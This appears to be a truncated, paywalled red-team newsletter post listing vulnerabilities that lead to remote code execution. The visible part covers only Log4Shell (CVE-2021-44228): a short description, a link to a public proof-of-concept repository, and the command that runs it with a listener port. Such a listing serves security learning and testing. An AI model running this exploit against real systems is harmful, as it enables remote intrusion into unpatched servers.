Top 50 Vulnerabilities Leading to RCE in Public-Facing Applications

Jan 26, 2025

∙ Paid

Log4Shell Vulnerability in Log4j

Vendor: Apache
CVE: CVE-2021-44228
CVSS: 10.0
Description: A critical flaw in the Apache Log4j library that allows for RCE via specially crafted log messages.

https://github.com/kozmer/log4j-shell-poc

python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozm…

Continue reading this post for free, courtesy of Reza.

Or purchase a paid subscription.

#nojs-banner { position: fixed; bottom: 0; left: 0; padding: 16px 16px 16px 32px; width: 100%; box-sizing: border-box; background: red; color: white; font-family: -apple-system, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 13px; line-height: 13px; } #nojs-banner a { color: inherit; text-decoration: underline; } This site requires JavaScript to run correctly. Please turn on JavaScript or unblock scripts

RedTeamGuides

Top 50 Vulnerabilities Leading to RCE in Public-Facing Applications

Log4Shell Vulnerability in Log4j

Continue reading this post for free, courtesy of Reza.